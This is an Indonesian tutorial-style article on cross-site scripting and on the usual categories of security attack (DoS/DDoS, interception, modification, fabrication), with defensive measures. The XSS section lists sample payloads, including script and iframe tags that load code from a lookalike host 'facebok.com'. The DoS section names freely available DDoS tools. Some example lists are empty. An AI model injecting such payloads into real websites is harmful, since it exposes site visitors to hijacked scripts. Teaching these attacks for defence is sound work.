XSS sebenarnya singkatan dari Cross-site Scripting. Jenis serangan ini hanya
diinjeksi pada client-side (sisi klien) saja. Dengan kata lain, serangan macam ini
dapat mengacu code injection attack pada sisi klien. Dimana penyerang dapat
mengeksekusi script berbahaya (yang biasa disebut sebagai payloads)
menjadi situs yang sah atau aplikasi web.
Pada artikel ini, saya akan menganggap bahwa kamu memiliki latar belakang
pengetahuan tentang bagaimana arsitektur Client-Server bekerja secara umum.
Sehingga kita dapat dengan mudah melanjutkan pembahasan tentang XSS ini.
Jika aplikasi Web rentan terhadap XSS, hal itu akan memungkinkan untuk
mengirim script berbahaya kepada pengunjung. Dan kemudian pengunjung
akan ditipu untuk mengaktifkan script berbahaya tersebut. Serangan XSS dapat
dilakukan dalam VBScript, ActiveX dan Flash. Akan tetapi sebagian besar dibuat
di Javascript, karena Javascript diaktifkan secara default pada semua browser.
<Script> tag:
1 <script src="http://facebok.com/xss.js"></script>
2 <script> alert(Boo!); </script>
<Body> tag:
<Img> tag:
1 <img src=javascript:alert(Evil);>
2 <img dynsrc=javascript:alert(Bad)>
3 <img lowsrc=javascript:alert(So bad!)>
<Iframe> tag:
1 <iframe src=http://facebok.com/xss.html>
<Input> tag:
<Table> tag:
1 <table background=javascript:alert(Evil)>
2 <td background=javascript:alert(So evil)>
<Object> tag:
<Div> tag:
Contoh-contoh diatas hanya beberapa dari yang paling dikenal. Hal tersebut
saya tunjukan agar kamu tahu bagaimana penyerang menginjeksi. Seperti yang
kamu lihat, jika ada bidang yang rentan, script injeksi akan diuraikan sebagai
kode. Lalu akan dijalankan secara lokal dan dapat digunakan untuk menipu
korban agar mengklik. Lewat hal itu juga penyerang dapat mengumpulkan
beberapa data dan mengarahkan kamu untuk mendapatkan data itu.
Security Attack
Security attacks atau serangan terhadap sistem keamanan jaringan komputer, adalah suatu usaha
untuk mengetahui fungsi di dalam suatu sistem komputer. Secara sederhana, alur informasi yang
benar adalah mengalir dari sumber informasi ke tujuan informasi tanpa ada gangguan selama
perjalanan dari sumber ke tujuan, dan tidak ada informasi yang hilang selama perjalanan
tersebut. Security attack merupakan Segala bentuk pola, cara, metode yang dapat menimbulkan
gangguan terhadap suatu sistem komputer atau jaringan.
Pola ini bekerja dengan menghancurkan suatu aset sistem, sehingga tidak lagi tersedia atau tidak
lagi bisa digunakan. Metoda ini adalah Serangan terhadap layanan availability system. Pada
serangan ini Perangkat sistem menjadi rusak atau tidak tersedia.
Contoh :
a. Perusakan suatu item hardware
b. Pemutusan jalur komunikasi
c. Disable suatu sistem manajemen file
d. Denial of service attack
Serangan interruption bisa dilakukan terhadap komputer dan server. Serangan terhadap komputer
dilakukan dengan merusak Harddisk, memotong kabel koneksi, dll. Sedangkan serangan
terhadap server berupa Denial of Service Attack (Dos Attack) dan DDoS Attack. Bentuk
serangan Denial of Service awal adalah serangan SYN Flooding Attack, yang pertama kali
muncul pada tahun 1996 dan mengeksploitasi terhadap kelemahan yang terdapat di dalam
protokol Transmission Control Protocol (TCP). Serangan-serangan lainnya akhirnya
dikembangkan untuk mengeksploitasi kelemahan yang terdapat di dalam sistem operasi, layanan
jaringan atau aplikasi untuk menjadikan sistem, layanan jaringan, atau aplikasi tersebut tidak
dapat melayani pengguna, atau bahkan mengalami crash.
Dalam sebuah serangan Denial of Service, si penyerang akan mencoba untuk mencegah akses
seorang pengguna terhadap sistem atau jaringan dengan menggunakan beberapa cara, yakni
sebagai berikut:
Membanjiri lalu lintas jaringan dengan banyak data sehingga lalu lintas jaringan yang datang
dari pengguna yang terdaftar menjadi tidak dapat masuk ke dalam sistem jaringan. Teknik ini
disebut sebagai traffic flooding.
Membanjiri jaringan dengan banyak request terhadap sebuah layanan jaringan yang
disedakan oleh sebuah host sehingga request yang datang dari pengguna terdaftar tidak dapat
dilayani oleh layanan tersebut. Teknik ini disebut sebagai request flooding.
Mengganggu komunikasi antara sebuah host dan kliennya yang terdaftar dengan
menggunakan banyak cara, termasuk dengan mengubah informasi konfigurasi sistem atau
bahkan perusakan fisik terhadap komponen dan server.
Distributed DoS Attack lebih canggih dibanding DoS Attack biasa. Serangan ini menggunakan
beberapa buah komputer sekaligus yang sudah di susupi dengan Trojan Horse agar dapat menjadi
zombie untuk dikendalikan dari jauh oleh penyerang. Setalah si penyerang merasa sudah
memiliki jumlah host zombie yang cukup, komputer master akan memberikan sinyal
penyerangan terhadap jaringan server. Skema serangan DDoS Attack ini sederhana, hanya saja
dilakukan oleh banyak host zombie sehingga menciptakan lalulintas jaringan yang besar.
Akibatnya akan memakan banyak bandwith jaringan target dan akhirnya mengalami
downtime.
Beberapa tools/software yang digunakan untuk melakukan serangan serperti ini adalah TFN,
TFN2K, Trinoo, Stacheldraht, SLOWLORIS (DDoS tools yang dibuat oleh Rsnake, sangat
powerful untuk check IIS server dan web aplikasi), HULK (DDoS tools untuk melakukan load
terhadap http request), THOR HAMMER (tools ddos yang bisa dilakukan dengan menggunakan
Tor application, terutama untuk server yang berbasis apache), dan LOIC yang dapat didownload
di internet secara bebas.
Kegiatan interruption di atas dapat di antisipasi dengan beberapa cara proteksi berikut:
Internet Firewall: untuk mencegah akses dari pihak luar ke sistem internal. Firewall dapat
bekerja dengan 2 cara, yaitu menggunakan filter dan proxy. Firewall filter menyaring komunikasi
agar terjadi seperlunya saja, hanya aplikasi tertentu saja yang bisa lewat dan hanya komputer
dengan identitas tertentu saja yang bisa berhubungan. Firewall proxy berarti mengizinkan
pemakai dalam untuk mengakses internet seluas-luasnya, tetapi dari luar hanya dapat mengakses
satu komputer tertentu saja.
Menutup service yang tidak digunakan.
Adanya sistem pemantau serangan yang digunakan untuk mengetahui adanya tamu/seseorang
yang tak diundang (intruder) atau adanya serangan (attack).
Melakukan back up secara rutin.
Adanya pemantau integritas sistem. Misalnya pada sistem UNIX adalah program tripwire.
Program ini dapat digunakan untuk memantau adanya perubahan pada berkas.
Perlu adanya cyberlaw: Cybercrime belum sepenuhnya terakomodasi dalam peraturan /
Undang-undang yang ada, penting adanya perangkat hukum khusus mengingat karakter dari
cybercrime ini berbeda dari kejahatan konvensional.
Perlunya Dukungan Lembaga Khusus: Lembaga ini diperlukan untuk memberikan informasi
tentang cybercrime, melakukan sosialisasi secara intensif kepada masyarakat, serta melakukan
riset-riset khusus dalam penanggulangan cybercrime.
Merupakan ancaman terhadap kerahasiaan (secrecy). Informasi yang ada disadap atau orang
yang tidak berhak mendapatkan akses ke komputer dimana informasi tersebut disimpan.
Intersepsi secara definisi merupakan Penyingkapan/pembocoran informasi. Pengaksesan aset
informasi oleh orang yang tidak berhak (misalkan terhadap program atau komputer). Pola ini
merupakan pengerangan terhadap layanan confidentiality suatu arus/aliran lalu-lintas informasi.
Contoh :
a. Pencurian data pengguna kartu kredit
b. Penyadapan (wiretapping)
3. Modification (pengubahan)
Maksud dari pengubahan disini, Pihak yang tidak berwenang tidak saja berhasil mengakses, akan
tetapi dapat juga mengubah aset informasi. Atau bisa juga merupakan Pengaksesan data oleh
orang yang tidak berhak, kemudian ditambah, dikurangi, atau diubah setelah itu baru dikirimkan
pada jalur komunikasi. Metode atau pola ini merupakan jenis serangan terhadap layanan
integrity.
Contoh :
Mengubah isi dan website dengan pesan-pesan yang merugikan pemilik website.
pengubahan suatu nilai file data
Pihak yang tidak berwenang menyisipkan objek palsu ke dalam sistem. Atau seorang user yang
tidak berhak mengambil data, kemudian menambahkannya dengan tujuan untuk dipalsukan.
Fabrication merupakan serangan terhadap layanan authentication.
Contoh :
Memasukkan pesan-pesan palsu seperti email palsu ke dalam jaringan computer.